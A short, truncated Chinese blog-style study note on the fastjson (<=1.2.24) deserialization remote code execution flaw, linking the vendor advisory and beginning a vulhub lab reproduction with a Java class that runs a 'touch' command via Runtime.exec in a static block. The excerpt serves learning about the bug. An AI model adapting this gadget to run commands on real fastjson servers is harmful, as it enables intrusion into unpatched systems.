fastjson反序列化漏洞学习

1 · [email protected] · May 31, 2020, 7:44 a.m.
fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞漏洞说明详情请见https://github.com/alibaba/fastjson/wiki/security_update_20170315漏洞时间为2017年,fastjson本身阿里巴巴开发的一个将数据再json格式和Java Object之间准换的库,github主页为:https://github.com/alibaba/fastjson漏洞范围:fastjson<=1.2.24漏洞复现下面使用vulhub进行效果的展示:通过发送一个json格式的数据,可以得到这个数据对应的信息。对以下代码进行编译:123456789101112public class TouchFile{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/home/success"}; Process pc = rt.exec(comm...